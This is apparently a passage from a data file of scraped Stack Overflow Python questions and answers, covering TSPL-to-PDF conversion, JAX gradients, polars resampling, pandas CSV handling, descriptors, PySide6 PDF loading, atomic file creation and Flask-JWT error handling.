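    Condition([3, 4], 0, 5),                      # {3,4} finished within the first five slots
]
for perm in permutations(values, conditions, 10): # 20 permute 10
    ...                                           # consume lazily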
79,548,517 | 2025-4-1 | https://stackoverflow.com/questions/79548517/how-to-use-redmon-for-generating-multiple-outputs-tspl-and-pdf | I have printer TSC TE 210. I created virtual printer on a RedMon port and installed TSC driver on it. I am able to generate printfile.prn file using redmon (redirecting output to python, that will edit the data and create .prn file), that has TSPL commands it it, e.g.: SIZE 97.6 mm, 50 mm GAP 3 mm, 0 mm DIRECTION 0,0 REFERENCE 0,0 OFFSET 0 mm SET PEEL OFF SET CUTTER OFF SET PARTIAL_CUTTER OFF SET TEAR ON CLS BITMAP 361,170,50,32,1,˙đ˙˙˙˙˙˙˙đ˙˙ü ˙˙˙˙˙˙ TEXT 586,152,"2",180,1,1,1,"1234AA" PRINT 1,1 Everything is good. I can edit the TSPL commands, add something etc, and then send it to real printer using copy printfile.prn /B "TSC TE210" (on windows) It works, because the generated .prn file has TSPL commands, and I am also sending TSPL commands to the printer for real printing. The problem is, I would like to create also PDF. I am able to do it! Also use redmon, but instead of forwarding it to python script, I used PostScript, that can indeed generate the pdf file. This virtual printer used PostScript driver. However, how to generate both files (.prn having TSPL), and .pdf file in the same time? I want to be super user friendly, print it once, and generate TSPL and pdf in the same time. What is limiting me? The thing I mentioned - using first approach, the virtual printer has to have TSC driver installed, that is why it generated TSPL commands. Second virtual printer has PS driver installed, that is why it generated PostScript file, that can be changed into PDF. But I can not have both driver installed on the same RedMon virtual printer. Any idea how to do it? I know I can create a script, that just take TSPL commands from the first approach, and somehow create PDF step by step. But that is really much work. I can probably create just PDF using PostScript, and try to work only with PDF, when everything is edited, try to print PDF on thermal printer, but thermal printers really dont like PDF, since the size of labels is not A4. And I would love to keep the native TSPL format for easier edits. Any solution, where I can use same data to create TSPL and PDF in one run? TLTR: I can create TSPL or PDF files using RedMon, but can not do both in the same run. Any trick that could do it? EDIT 2.4.2025: I was able to create python script that will visualize the TSPL bitmap using plt library. Thanks to the @K J answer, I understood that I have to scale the width by 8. However, only one of the 4 bitmaps looks good. 
Also I dont know how to make them visible together: import numpy as np import matplotlib.pyplot as plt from PIL import Image import re bitmap_parameters = [] bitmap_lines = [] with open("TSPL.prn", "rb") as f: for line in f.readlines(): if line.startswith(b"BITMAP"): match = re.match(br'BITMAP (\d{1,5}),(\d{1,5}),(\d{1,5}),(\d{1,5}),(\d{1,5}),', line) if match: bitmap_parameters.append(match.groups()) bitmap_lines.append( re.sub(br'BITMAP \d{1,5},\d{1,5},\d{1,5},\d{1,5},\d{1,5},', b'', line) ) fig, axes = plt.subplots(1, len(bitmap_lines)) if len(bitmap_lines) == 1: axes = [axes] for i in range(len(bitmap_lines)): bitmap_bytes = bitmap_lines[0] width, height = int(bitmap_parameters[i][2]), int(bitmap_parameters[i][3]) width *= 8 bitmap = np.frombuffer(bitmap_bytes, dtype=np.uint8) bitmap = np.unpackbits(bitmap)[:width * height] try: bitmap = bitmap.reshape((height, width)) except: print("error") continue axes[i].imshow(bitmap, cmap="gray", interpolation="nearest") axes[i].axis("off") plt.show() Result: | This is a good question and from long discussions we get to the hub of an XY problem. Only one print type (text, vector or raster) at a time, can be one applications printout. In this case the desire is Textual TSPL (203 DPI: 1 mm = 8 dots) and vector PDF 1000 sub units = 1/72" (printer point). PDF is not a good source format as many source constructs that are needed are discarded. Thus the simpler conversion will be TSPL to PDFL. The way to convert one format to another is first replace similar functions in large blocks. The header in a TSPL file is something like: So the first challenge is positional units are counted as 8 per mm and the direction in this case is upside down, plus compared to most conventions inverted. This poses needing programming to convert such placements and bitmaps. I am working on what text syntax is needed for the programming as it does not matter if C++#.js or Python.py in PDF term it is simply "ANSI" binary text as byte streams. Without correction for scale and colours the result of bitmaps would seem oddly oversized, rotated and negative, however that is easily fixable in terms of simple text values. So at this stage we can replace the text header from this: SIZE 97.6 mm, 50 mm GAP 3 mm, 0 mm DIRECTION 0,0 REFERENCE 0,0 OFFSET 0 mm SET PEEL OFF SET CUTTER OFF SET PARTIAL_CUTTER OFF SET TEAR ON CLS BITMAP 25,50,92,112,1, ÿÿÿÿ To something like this where we use the common up and downscale by 8 dots. Basically we multiply the 92 x 8 = /Width 736 ! First we set the page (object 3) to 97.6 x 8 = 781 width and 50 x 8 high = 400 dots, and reserve objects 5,6 & 7 for the 3 bitmaps. %PDF-1.6 %Åѧ¡ 1 0 obj <</Type/Catalog/Pages 2 0 R>> endobj 2 0 obj <</Type/Pages/Count 1/Kids[3 0 R]>> endobj 3 0 obj <</Type/Page/Parent 2 0 R/MediaBox[0 0 781 400]/UserUnit 0.3545/Contents 4 0 R /Resources<</XObject<</Im1 5 0 R/Im2 6 0 R/Im3 7 0 R>>>>/Rotate 180>> endobj 4 0 obj <</Length 103>> stream q 736 0 0 112 25 50 cm /Im1 Do Q q 400 0 0 32 361 170 cm /Im2 Do Q q 736 0 0 168 25 210 cm /Im3 Do Q endstream endobj 5 0 obj <</Type/XObject/Subtype/Image/BitsPerComponent 1/ColorSpace[/Indexed/DeviceRGB 1<000000FFFFFF>]/Width 736/Height 112/Length 10304>> stream ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ... 10 KB image endstream endobj 6 0 obj similar but different width to 5 (1600 bytes) stream ÿÿÿÿÿÿÿÿÿÿ... 1.56 KB image endstream endobj 7 0 obj similar but different width to 5 (15456 bytes) stream ÿÿÿÿÿÿÿÿÿÿ... 
15 KB image endstream endobj Changing colours is fairly simple as we just say black is white: /ColorSpace[/Indexed/DeviceRGB 1<000000FFFFFF>] We can also set a page scale to roughly 203.10 units per inch and rotate by 180. /Rotate 180/Type/Page/UserUnit 0.3545 (this addition requires we update header to 1.6) So far so good the images are well placed Just to round up on the final result: When the bitmaps have been placed, each object will have a decimal based starting address which we use for the trailer index. The easiest way if using a command line to write the PDF is measure file byte length "position" after each step and before the next and keep an array of those end/start points! The numbers need to account for the variable entries so if there were 3 images as object 5, 6 & 7 then the last object will have been 7 0 obj but in this format the Xref table always starts with a blank 65536 f \n entry. The line end is either \r\n or a spaced \n to ensure index lines are always 20 characters ! So in this case the xref starts with 0 8 and ends with a similar <</Size 8/Root 1 0 R>> also you need to change the startxref decimal address value to the start position of xref ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ endstream endobj xref 0 8 0000000000 65536 f 0000000015 00000 n 0000000060 00000 n 0000000111 00000 n 0000000277 00000 n 0000000429 00000 n 0000010898 00000 n 0000012661 00000 n trailer <</Size 8/Root 1 0 R>> startxref 28283 %%EOF | 1 | 1 |
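A tiny sketch of the placement arithmetic described above: a TSPL BITMAP x,y,width-in-bytes,height header becomes a PDF `cm` matrix with the width scaled by 8 dots per byte (the image name is arbitrary):

def tspl_bitmap_to_pdf_cm(x, y, width_bytes, height, image_name="Im1"):
    width_dots = width_bytes * 8          # 1 byte of bitmap data = 8 horizontal dots
    return f"q {width_dots} 0 0 {height} {x} {y} cm /{image_name} Do Q"

print(tspl_bitmap_to_pdf_cm(25, 50, 92, 112))   # -> q 736 0 0 112 25 50 cm /Im1 Do Q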
79,550,040 | 2025-4-2 | https://stackoverflow.com/questions/79550040/why-is-jax-treating-floating-point-values-as-tracers-rather-than-concretizing-th | I am doing some physics simulations using jax, and this involves a function called the Hamiltonian defined as follows: # Constructing the Hamiltonian @partial(jit, static_argnames=['n', 'omega']) def hamiltonian(n: int, omega: float): """Construct the Hamiltonian for the system.""" H = omega * create(n) @ annhilate(n) return H and then a bigger function def solve_diff(n, omega, kappa, alpha0): that is defined as follows: @partial(jit, static_argnames=['n', 'omega']) def solve_diff(n, omega, kappa, alpha0): # Some functionality that uses kappa and alpha0 H = hamiltonian(n, omega) # returns an expectation value When I try to compute the gradient of this function using jax.grad n = 16 omega = 1.0 kappa = 0.1 alpha0 = 1.0 # Compute gradients with respect to omega, kappa, and alpha0 grad_population = grad(solve_diff, argnums=(1, 2, 3)) grads = grad_population(n, omega, kappa, alpha0) print(f"Gradient w.r.t. omega: {grads[0]}") print(f"Gradient w.r.t. kappa: {grads[1]}") print(f"Gradient w.r.t. alpha0: {grads[2]}") it outputs the following error: ValueError: Non-hashable static arguments are not supported. An error occurred while trying to hash an object of type <class 'jax._src.interpreters.ad.JVPTracer'>, Traced<ShapedArray(float32[], weak_type=True)>with<JVPTrace> with primal = 1.0 tangent = Traced<ShapedArray(float32[], weak_type=True)>with<JaxprTrace> with pval = (ShapedArray(float32[], weak_type=True), None) recipe = LambdaBinding(). The error was: TypeError: unhashable type: 'JVPTracer' Though, running solve_diff(16,1.0,0.1,1.0) on its own works as expected. Now if I remove omega from the list of static variables for both the hamiltonian function and the solve_diff, the grad is output as expected. This is confusing me, because I no longer know what qualifies as static or dynamic variables anymore, from the definition that static variables does not change between function calls, both n and omega are constants and indeed should not change between function calls. | The fundamental issue is that you cannot differentiate with respect to a static variable, and if you try to do so you will get the error you observed. This is confusing me, because I no longer know what qualifies as static or dynamic variables anymore, from the definition that static variables does not change between function calls In JAX, the term "static" does not have to do with whether the variable is changed between function calls. Rather, a static variable is a variable that does not participate in tracing, which is the mechanism used to compute transformations like vmap, grad, jit, etc. When you differentiate with respect to a variable, it is no longer static because it is participating in the autodiff transformation, and trying to treat it as static later in the computation will lead to an error. For a discussion of transformations, tracing, and related concepts, I'd start with JAX Key Concepts: transformations. | 1 | 1 |
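A runnable sketch of the fix that follows from this: only n stays static, so omega remains a traced, differentiable value. The create/annhilate stand-ins and the solve_diff body below are placeholders for the question's real operators, not the original code:

from functools import partial
import jax.numpy as jnp
from jax import jit, grad

def create(n):        # stand-in for the question's ladder operators
    return jnp.eye(n, k=1)

def annhilate(n):
    return jnp.eye(n, k=-1)

@partial(jit, static_argnames=["n"])      # only n is static now
def hamiltonian(n, omega):                # omega is traced, hence differentiable
    return omega * create(n) @ annhilate(n)

@partial(jit, static_argnames=["n"])
def solve_diff(n, omega, kappa, alpha0):
    H = hamiltonian(n, omega)
    return jnp.trace(H) * kappa * alpha0  # placeholder for the real expectation value

grads = grad(solve_diff, argnums=(1, 2, 3))(16, 1.0, 0.1, 1.0)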
79,549,881 | 2025-4-2 | https://stackoverflow.com/questions/79549881/how-to-resample-a-dataset-to-achieve-a-uniform-distribution | I have a dataset with a schema like: df = pl.DataFrame( { "target": [ [1.0, 1.0, 0.0], [1.0, 1.0, 0.1], [1.0, 1.0, 0.2], [1.0, 1.0, 0.8], [1.0, 1.0, 0.9], [1.0, 1.0, 1.0], ], "feature": ["a", "b", "c", "d", "e", "f"], }, schema={ "target": pl.Array(pl.Float32, 3), "feature": pl.String, }, ) If I make a histogram of the target-z values it looks like: I want to resample the data so its flat along z. I managed to do it in a hacky-many-steps way (also very slow). I was wondering if people could suggest a cleaner (and more efficient) way? What I am doing is: Find the bin edges of said histogram: bins = 2 # Use e.g. 100 or larger in reality z = df.select(z=pl.col("target").arr.get(2)) z_min = z.min() z_max = z.max() breaks = np.linspace(z_min, z_max, num=bins+1) Find how many counts are in the bin with the fewest counts: counts = ( df.with_columns(bin=pl.col("target").arr.get(2).cut(breaks)) .with_columns(counter=pl.int_range(pl.len()).over("bin")) .group_by("bin") .agg(pl.col("counter").max()) .filter(pl.col("counter") > 0) # <- Nasty way of filtering the (-inf, min] bin .select(pl.col("counter").min()) ).item() Choose only "count" elements on each bin: df = ( df.with_columns(bin=pl.col("target").arr.get(2).cut(breaks)) .with_columns(counter=pl.int_range(pl.len()).over("bin")) .filter(pl.col("counter") <= counts) .select("target", "feature") ) This gives me: Do people have any suggestions? | I don't think you can avoid those three steps for resampling (although depending on your use case you could try to transform the data instead) You can optimize that code a bit though, import polars as pl import numpy as np # Some random mocked data rng = np.random.default_rng() df = pl.DataFrame({'z': rng.lognormal(size=100_000) - 0.5}).filter(pl.col('z').is_between(0.0, 1.0)) z = pl.col('z') # Create the bins using polars, and only once cuts = df.select(pl.linear_space(z.min(), z.max(), 99, closed='none'))['z'] df = df.with_columns(bin=z.cut(cuts)) # just use len() instead of range+max() counts = ( df .group_by("bin") .len() .select(pl.col("len").min()) ).item() # take the head of each group or sample result = ( df .group_by('bin') # .head(counts) # You can just use this instead of .map_groups(...sample(counts)), # and head() is closer to what you had in the original, but # taking only the head() may bias the data if the order is not random .map_groups(lambda df: df.sample(counts)) .drop('bin') ) print(result) | 2 | 2 |
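An optional sanity check (a hypothetical follow-up, reusing z and cuts from the answer) to confirm the resampled bins are now roughly flat:

print(
    result
    .with_columns(bin=z.cut(cuts))
    .group_by("bin")
    .len()
)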
79,550,795 | 2025-4-2 | https://stackoverflow.com/questions/79550795/python-dataframe-structure-breaks-when-appending-the-file | I am trying to get user inputs to create a file where users can store website, username, and password in table format whenever users hit a button. I made the function below, and it looks okay to me. However, when a user enters the second and third entries, the data frame structure is broken. Any idea why it happens? You may see the print result each time adding a row to my data. Code: from tkinter import * import pandas as pd import os def save_password(): website_name = input("Website: ") username = input("Username: ") password = input("Password: ") # password_details = f"website: {website_name};username: {username};password: {password}" input_entries_dict = {"Website": [website_name], "Username/Email": [username], "Password": [password]} input_entries_df = pd.DataFrame(input_entries_dict) if not os.path.isfile("MyPassword_test.txt"): input_entries_df.to_csv("MyPassword_test.txt", index=False) print(input_entries_df) else: data = pd.read_csv("MyPassword_test.txt") data = data._append(input_entries_df, ignore_index=True, sort=True) print(data) data.to_csv("MyPassword_test.txt", sep=";", index=False) save_password() Outputs for each time: First entry: ALL FINE Website Username/Email Password 0 d32d23 f7324f2 f3223f2 Second Entry: Column names are shifted Password Username/Email Website 0 f3223f2 f7324f2 d32d23 1 ddwefddsfds5 32fwefw5 48sfd4s Third Entry:Colum of "Password;Username/Email;Website" created! Password Password;Username/Email;Website Username/Email Website 0 NaN f3223f2;f7324f2;d32d23 NaN NaN 1 NaN ddwefddsfds5;32fwefw5;48sfd4s NaN NaN 2 154152 NaN f32f23f23 2f23f2332 | The confusion is caused by writing the .CSV with a ; separator but ignoring this on reading. Use: else: data = pd.read_csv("MyPassword_test.txt") data = pd.concat([data, input_entries_df], ignore_index=True) print(data) data.to_csv("MyPassword_test.txt", index=False) | 1 | 2 |
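A sketch of the save branch with the separator kept consistent in both directions, reusing the question's imports and input_entries_df (sep=";" is just one choice; sticking with the default comma works equally well):

SEP = ";"
PATH = "MyPassword_test.txt"

if not os.path.isfile(PATH):
    input_entries_df.to_csv(PATH, sep=SEP, index=False)
else:
    data = pd.read_csv(PATH, sep=SEP)                        # read with the same separator
    data = pd.concat([data, input_entries_df], ignore_index=True)
    data.to_csv(PATH, sep=SEP, index=False)                  # write with the same separator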
79,550,287 | 2025-4-2 | https://stackoverflow.com/questions/79550287/python-descriptors-on-readonly-attributes | I want to refactor a big part of my code into a generic descriptor for read only attribute access. The following is an example of property based implementation class A: def __init__(self, n): self._n = n self._top = -1 @property def n(self): return self._n @property def top(self): return self._top def increase(self): self._top += 1 you see I can initialize my A class and increase self._top but not to let user set a.top by omitting property setter method a = A(7) a.top Out[25]: -1 a.increase() a.top Out[27]: 0 if I do a.top = 4, it will give me an error AttributeError: property 'top' of 'A' object has no setter which is expected. Now, I want to refactor this logic into a descriptor class ReadOnly: def __init__(self): self._name = None def __set_name__(self, owner, name): self._name = name def __get__(self, instance, owner): if instance is None: return self return instance.__dict__[self._name] def __set__(self, instance, value): raise AttributeError("Can't set attribute") def __delete__(self, instance): raise AttributeError("Can't delete attribute") class A: n = ReadOnly() top = ReadOnly() def __init__(self, n): self.n = n self.top = -1 def increase(self): self.top += 1 Well, this doesn't work. I can't even initialize the class A anymore, cause in __init__ it will set n and top immediately and prevent my from initialize. How to write this logic from property into descriptor? P.S. Thank @chepner for this solution. This is what I'm looking for. I made it work. One last thing, if I have a attribute is a list say class Stack: S = ReadOnly() n = ReadOnly() top = ReadOnly() def __init__(self, n): self._S = [None] * n self._n = n self._top = -1 # python offset 1 Now I can't change self.top anymore >>> s = Stack(4) >>> s.S [None, None, None, None] Nor I can change s >>> s.S = [1, 3] # not allowed anymore. Great! But I can still change an element in the list >>> s.S[3] = 3 [None, None, None, 3] How can I prevent list element changes? | Instead of disallowing all modifications, simply check if the attribute exists on instance before creating it. If it already exists, raise the AttributeError. Otherwise, let the attribute be created. def __set__(self, instance, value): if self._name in instance.__dict__: raise AttributeError("Can't set attribute") instance.__dict__[self._name] = value Also, if I remember correctly, -- Update: I did not. If the class attribute has __get__ and __set__, it takes priority over an instance attribute of the same name. Here is a good reference. However, I would still give the instance attribute a different name for clarity. --you need to use a different name for the underlying private attribute so that you don't shadow the descriptor. def __set_name__(self, owner, name): self._name = "_" + name | 1 | 2 |
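Putting the answer's two changes together (the set-once guard plus the leading-underscore storage name), a sketch of the descriptor:

class ReadOnly:
    def __set_name__(self, owner, name):
        self._name = "_" + name                      # store under a private name

    def __get__(self, instance, owner):
        if instance is None:
            return self
        return instance.__dict__[self._name]

    def __set__(self, instance, value):
        if self._name in instance.__dict__:
            raise AttributeError("Can't set attribute")   # allow the first assignment only
        instance.__dict__[self._name] = value

    def __delete__(self, instance):
        raise AttributeError("Can't delete attribute")

Note that with the set-once guard, internal mutation has to go through the private name (self._top += 1 inside increase()), exactly as the question's Stack class already does; external writes to s.top or s.n keep raising AttributeError.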
79,550,276 | 2025-4-2 | https://stackoverflow.com/questions/79550276/how-to-load-a-pdf-from-bytes-instead-of-file-in-pyside6 | I'm trying to display a PDF I created (using fpdf2) in a Pyside6 app. There seems to be two roads there: I can use QWebEngineView with plugins enabled, in which I can inject the PDF raw bytes, which works. It is not ideal for me since there's a lot of UI involved ; I'd like something cleaner. Or I can use QPdfView. That widgets takes an QPdfDocument object from which it reads from. Unfortunately, QPdfDocument only have a .load() function that takes a filename. Since I'm looking to avoid disk writes there, I'm not interested in temporarly saving the file to disk to show it on the GUI. There's two signatures on the .load() function tho : Supported signatures: PySide6.QtPdf.QPdfDocument.load(PySide6.QtCore.QIODevice, /) PySide6.QtPdf.QPdfDocument.load(str, /) Here's the thing: I can't instantiate a QIODevice from Python, so I can't feed it PDF's bytes like a buffer (there's a .write() function that looks interesting). I've tried using BytesIO (from io package), but no luck there. Is there a way to create a QPdfDocument object from a PDF file's bytes? Thanks for your help! | You need to use a QBuffer (which inherits QIODevice) backed by a QByteArray containing the pdf bytes data. The buffer doesn't take ownership of the data, and the document doesn't take ownership of the buffer, so you need to ensure these objects are kept alive whilst the pdf is loading. A slot connected to the statusChanged signal can be used to clean up the objects once the document is loaded (or if an error occurs). A basic example that implements all that is given below (just provide a pdf file-path as a command-line argument to test it). (PS: whilst testing, I found that the viewer seg-faults on exit if a document has successfully loaded. This happens even when loading from a file-path. The issue is fairly harmless, and it can be easily fixed by explicitly closing the document before closing down the application. I get the same problem using either PySide-6.8.3 or PyQt-6.8.1 with Qt-6.8.3 on Linux, so it seems to be caused by a Qt bug. It's possible that other versions/platforms aren't affected). DEMO: import sys from PySide6 import QtCore, QtWidgets, QtPdf, QtPdfWidgets # from PyQt6 import QtCore, QtWidgets, QtPdf, QtPdfWidgets class PdfView(QtPdfWidgets.QPdfView): def __init__(self, parent=None): super().__init__(parent) self.setDocument(QtPdf.QPdfDocument(self)) self.document().statusChanged.connect(self.handleStatusChanged) def loadData(self, data): self._data = QtCore.QByteArray(data) self._buffer = QtCore.QBuffer(self._data) self._buffer.open(QtCore.QIODeviceBase.OpenModeFlag.ReadOnly) self.document().load(self._buffer) def handleStatusChanged(self, status): print(status) if (status == QtPdf.QPdfDocument.Status.Ready or status == QtPdf.QPdfDocument.Status.Error): self._buffer.close() del self._buffer, self._data def closeEvent(self, event): # prevent seg-fault on exit self.document().close() if __name__ == '__main__': app = QtWidgets.QApplication(['Test']) pdfview = PdfView() pdfview.setGeometry(600, 100, 800, 600) # FOR TESTING PURPOSES ONLY # get sample pdf bytes data with open(sys.argv[1], 'rb') as stream: pdfview.loadData(stream.read()) pdfview.show() app.exec() | 2 | 1 |
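Tying this back to the question's fpdf2 workflow, the bytes can be produced entirely in memory and handed to loadData(); the exact fpdf2 calls below are illustrative and may differ slightly between fpdf2 versions. This would replace the file-reading test stub in the answer's __main__ block:

from fpdf import FPDF    # fpdf2

pdf = FPDF()
pdf.add_page()
pdf.set_font("Helvetica", size=12)
pdf.cell(40, 10, "hello from memory")
pdf_bytes = bytes(pdf.output())    # fpdf2's output() returns the document as a bytearray

pdfview.loadData(pdf_bytes)        # no disk write involved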
79,549,767 | 2025-4-2 | https://stackoverflow.com/questions/79549767/create-a-new-file-moving-an-existing-file-out-of-the-way-if-needed | What is the best way to create a new file in Python, moving if needed an existing file with the same name to a different path? While you could do if os.path.exists(name_of_file): os.move(name_of_file, backup_name) f = open(name_of_file, "w") that has TOCTOU issues (e.g. multiple processes could try and create the file at the same time). Can I avoid those issues using only the standard library (preferably), or is there a package which handles this. You can assume a POSIX file system. | In a loop: Open the file exclusively (open(..., "x") or O_CREAT|O_EXCL). If that fails with FileExistsError (EEXIST), then atomically os.rename the existing file to something else. Try again. If that renaming fails with anything other than FileExistsError (ENOENT, meaning someone else removed or renamed the offending file before you did), break the loop and fail. (It's not clear to me how your competing processes can know it is OK to move the existing file out of the way or not, but presumably you've knowledge of your use case that I do not.) | 2 | 3 |
79,548,581 | 2025-4-1 | https://stackoverflow.com/questions/79548581/jwt-token-expiration-handling-causing-500-error-in-flask-jwt-extended-and-flask | Problem: I'm building a Flask backend using flask-restful, flask-jwt-extended, and PostgreSQL. When testing JWT token expiration via Postman, expired tokens consistently result in a 500 Internal Server Error instead of a 401 Unauthorized response. Desired Behavior: When a JWT token expires, my API should return a JSON response: {"message": "Token has expired"} Currently, an expired token results in this error: {"message": "Internal Server Error"} Server Logs Traceback: jwt.exceptions.ExpiredSignatureError: Signature has expired Relevent Code: Flask App Initialization (init.py) from flask import Flask, jsonify from flask_jwt_extended import JWTManager from flask_restful import Api from flask_cors import CORS from flask_sqlalchemy import SQLAlchemy from flask_migrate import Migrate import os from dotenv import load_dotenv load_dotenv() app = Flask(__name__) CORS(app, supports_credentials=True) app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL') app.config['JWT_SECRET_KEY'] = os.getenv('JWT_SECRET_KEY', 'temporary_secret') jwt = JWTManager(app) db = SQLAlchemy(app) api = Api(app) migrate = Migrate(app, db) # JWT error handlers @jwt.expired_token_loader def expired_token_callback(jwt_header, jwt_payload): return jsonify({"message": "Token has expired"}), 401 @jwt.invalid_token_loader def invalid_token_callback(error): return jsonify({"message": "Invalid token"}), 401 @jwt.unauthorized_loader def unauthorized_callback(error): return jsonify({"message": "Missing or invalid Authorization header"}), 401 if __name__ == "__main__": app.run(host="0.0.0.0", port=5000, debug=True) Auth Resource (auth_resource.py) from flask_restful import Resource, reqparse from flask_jwt_extended import ( create_access_token, create_refresh_token, jwt_required, get_jwt_identity ) from werkzeug.security import check_password_hash from datetime import timedelta from app.models import User parser = reqparse.RequestParser() parser.add_argument('username', required=True) parser.add_argument('password', required=True) class LoginResource(Resource): def post(self): data = parser.parse_args() user = User.query.filter_by(username=data['username']).first() if user and check_password_hash(user.password_hash, data['password']): access_token = create_access_token(identity=user.id, expires_delta=timedelta(seconds=30)) refresh_token = create_refresh_token(identity=user.id, expires_delta=timedelta(minutes=2)) return {'access_token': access_token, 'refresh_token': refresh_token}, 200 return {'msg': 'Invalid credentials'}, 401 class ProtectedResource(Resource): @jwt_required() def get(self): identity = get_jwt_identity() return {'logged_in_as': identity}, 200 Testing Approach & Results (Postman) Login works (200 OK), returns tokens. Access protected resource (200 OK) initially with valid token. Wait 30 seconds (token expiration), then call protected resource again. 
Expected: 401 {"message": "Token has expired"} Actual: 500 Internal Server Error Server Logs: ERROR in app: Exception on /api/protected [GET] Traceback (most recent call last): File "/usr/local/lib/python3.11/site-packages/flask/app.py", line 917, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python3.11/site-packages/flask/app.py", line 902, in dispatch_request return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) File "/usr/local/lib/python3.11/site-packages/flask_restful/__init__.py", line 604, in dispatch_request resp = meth(*args, **kwargs) File "/usr/local/lib/python3.11/site-packages/flask_jwt_extended/view_decorators.py", line 167, in decorator verify_jwt_in_request( File "/usr/local/lib/python3.11/site-packages/flask_jwt_extended/utils.py", line 128, in decode_token return jwt_manager._decode_jwt_from_config(encoded_token, csrf_value, allow_expired) File "/usr/local/lib/python3.11/site-packages/jwt/api_jwt.py", line 363, in _validate_exp raise ExpiredSignatureError("Signature has expired") jwt.exceptions.ExpiredSignatureError: Signature has expired What I've Tried without success: Implemented JWT global error handlers (expired_token_loader). Verified correct registration of JWT callbacks. Simplified the endpoint code to remove internal exception handling (as JWT errors should be handled globally). Fully rebuilt Docker containers multiple times to ensure fresh deployment. Questions Why isn't my global expired_token_loader capturing the expired token exceptions from the decorator? Is there an error in the way I've configured flask_jwt_extended with flask_restful that prevents global handlers from triggering? What steps can I take to isolate or debug the issue further? Environment Details Python: 3.11 (Dockerized) Flask: latest Flask-JWT-Extended: latest Flask-Restful: latest PostgreSQL database (Dockerized) Docker Compose setup for backend, frontend, and database | Figured out that I had to force handling JWT exceptions globally: Configured Flask and Flask-RESTful to propagate JWT exceptions correctly by adding the following code to init.py: app.config['PROPAGATE_EXCEPTIONS'] = True # Propagate exceptions to the client api.handle_errors = False # Disable Flask-RESTful This provided the results I was looking for and I successfully tested the JWT lifecycle: Login: Issued JWT tokens via /api/login. Valid Token: Accessed protected resource successfully. Expired Token: Received expected 401 error ("Token has expired"). Token Refresh: Successfully refreshed JWT token via /api/refresh. New Token: Validated new token with protected endpoint access. Sources for the developed solution: https://github.com/vimalloc/flask-jwt-extended/issues/308 https://github.com/vimalloc/flask-jwt-extended/issues/86 https://github.com/vimalloc/flask-jwt-extended/issues/83 https://github.com/vimalloc/flask-jwt-extended/blob/main/flask_jwt_extended/jwt_manager.py#L81 | 2 | 1 |
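For completeness, the two lines from the self-answer slot into the existing __init__.py roughly like this (a sketch of placement only; the JWT error handlers stay registered as before):

app = Flask(__name__)
app.config["PROPAGATE_EXCEPTIONS"] = True   # let the JWT exception reach the registered handlers

jwt = JWTManager(app)
api = Api(app)
api.handle_errors = False                   # keep Flask-RESTful from converting it into a 500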
79,550,403 | 2025-4-2 | https://stackoverflow.com/questions/79550403/get-a-row-subset-of-a-pandas-dataframe-based-on-conditions-with-query | I would like to gain a subset of a Pandas Dataframe based on query, if possible giving several conditions based on column values where only rows have to be selected until conditions appear for the first time. Probably this is nothing new. I do just not find the right answers from other posts. The example Dataframe: import pandas as pd df_GPS = pd.DataFrame([['2024-06-21 06:22:38', 22958, 605.968389, 1, 2, 1], ['2024-06-21 06:22:39', 22959, 606.009398, 3, 0, 1], ['2024-06-21 06:22:40', 22960, 605.630573, 1, 2, 0], ['2024-06-21 06:22:41', 22961, 605.476367, 3, 3, 0], ['2024-06-21 06:22:42', 22962, 605.322161, 2, 1, 1], ['2024-06-21 06:22:43', 22963, 605.268389, 4, 1, 0], ['2024-06-21 06:22:44', 22964, 605.559398, 1, 3, 1], ['2024-06-21 06:22:45', 22965, 606.630573, 2, 9 , 0], ['2024-06-21 06:22:46', 22966, 607.476367, 15, 13, 3], ['2024-06-21 06:22:47', 22967, 609.322161, 23, 19, 12], ['2024-06-21 06:22:48', 22968, 607.155939, 20, 21, 16], ['2024-06-21 06:22:49', 22969, 606.763057, 18, 14, 8], ['2024-06-21 06:22:50', 22970, 605.333781, 1, 1, 1], ['2024-06-21 06:22:50', 22971, 604.333781, 15, 1, 1] ], columns=['time', '__UTCs__','Altitude', 's01[m]', 's5.5[m]', 's10[m]']) df_GPS time __UTCs__ Altitude s01[m] s5.5[m] s10[m] 0 2024-06-21 06:22:38 22958 605.968389 1 2 1 1 2024-06-21 06:22:39 22959 606.009398 3 0 1 2 2024-06-21 06:22:40 22960 605.630573 1 2 0 3 2024-06-21 06:22:41 22961 605.476367 3 3 0 4 2024-06-21 06:22:42 22962 605.322161 2 1 1 5 2024-06-21 06:22:43 22963 605.268389 4 1 0 6 2024-06-21 06:22:44 22964 605.559398 1 3 1 7 2024-06-21 06:22:45 22965 606.630573 2 9 0 8 2024-06-21 06:22:46 22966 607.476367 15 13 3 9 2024-06-21 06:22:47 22967 609.322161 23 19 12 10 2024-06-21 06:22:48 22968 607.155939 20 21 16 11 2024-06-21 06:22:49 22969 606.763057 18 14 8 12 2024-06-21 06:22:50 22970 605.333781 1 1 1 13 2024-06-21 06:22:50 22971 604.333781 15 1 1 The result I am aiming at looks like: time __UTCs__ Altitude s01[m] s5.5[m] s10[m] 1 2024-06-21 06:22:40 22960 605.630573 1 2 0 2 2024-06-21 06:22:41 22961 605.476367 3 3 0 3 2024-06-21 06:22:42 22962 605.322161 2 1 1 4 2024-06-21 06:22:43 22963 605.268389 4 1 0 5 2024-06-21 06:22:44 22964 605.559398 1 3 1 6 2024-06-21 06:22:45 22965 606.630573 2 9 0 7 2024-06-21 06:22:46 22966 607.476367 15 13 3 I tried with query (what I thought should be the most elegant way): df_sub = df_GPS.query('__UTCs__ >= 22960 & s01[m] < 16') which gives an UndefinedVariableError: name 's01' is not defined maybe due to the underlines or the brackets in the column names? How would I define that these are columns of df_GPS? On the other side df_sub = df_GPS[((df_GPS['__UTCs__'] >= 22960) & (df_GPS['s01[m]'] < 16))].copy() Which results in: time __UTCs__ Altitude s01[m] s5.5[m] s10[m] 2 2024-06-21 06:22:40 22960 605.630573 1 2 0 3 2024-06-21 06:22:41 22961 605.476367 3 3 0 4 2024-06-21 06:22:42 22962 605.322161 2 1 1 5 2024-06-21 06:22:43 22963 605.268389 4 1 0 6 2024-06-21 06:22:44 22964 605.559398 1 3 1 7 2024-06-21 06:22:45 22965 